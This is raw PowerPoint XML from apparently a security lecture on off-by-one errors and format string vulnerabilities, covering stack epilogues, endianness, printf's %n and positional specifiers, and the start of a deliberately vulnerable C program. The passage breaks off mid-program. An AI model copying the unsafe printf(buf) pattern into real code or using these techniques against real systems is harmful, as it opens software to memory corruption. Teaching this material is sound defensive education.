          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>main() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34"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5"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a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36"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a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1491222147"/>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Lessons Learned	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Loops must be thoroughly checked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User-supplied input should not lead to arbitrary loop iterations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Off-by-one vulnerabilities can cause crashes and also the execution of arbitrary code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181780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2" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Beware of the Endianess </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(and of Signed Integers)!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1036293" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Intel uses little endian ordering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x03020100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> starting at address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x00F67B40</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x00F67B40   00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	0x00F67B41   01     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	0x00F67B42   02     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	0x00F67B43   03</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Signed integers are expressed in 2’s complement notation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The sign is changed by flipping the bits and adding one, ignoring the overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-1 is 0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-2 is 0xFFFFFFFE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?? is 0xFFFFF826</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Having a calculator handy is a good thing...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="176167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2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62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62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2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62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62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629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629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629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629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629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p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is Overwritten:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="986115" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whenever a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(... char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>...) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>function is used with user-supplied input it is possible to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>read/write values </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in the process memory by providing a carefully crafted format string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("Hello %s!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, name)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is not! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>will be interpreted as a format string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>="%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>d %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>d"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>arameters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>missing, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>values from the stack are used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>instead</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182171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6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6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6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6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6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Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’s Lesser Known Facts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possible to reference the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" err="1" smtClean="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> element on the argument list using the notation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i$p</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note: This does not cause an argument to be popped from the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is possible to specify the amount of characters being printed using the notation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>kp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is found, the number of output characters processed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>stored at the address passed as the next argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</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Hello%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>puts the value 5 in the variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134224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Vulnerable Program</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>stdlib.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>const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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	FILE* f;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	f = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/log", "a+");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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add_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
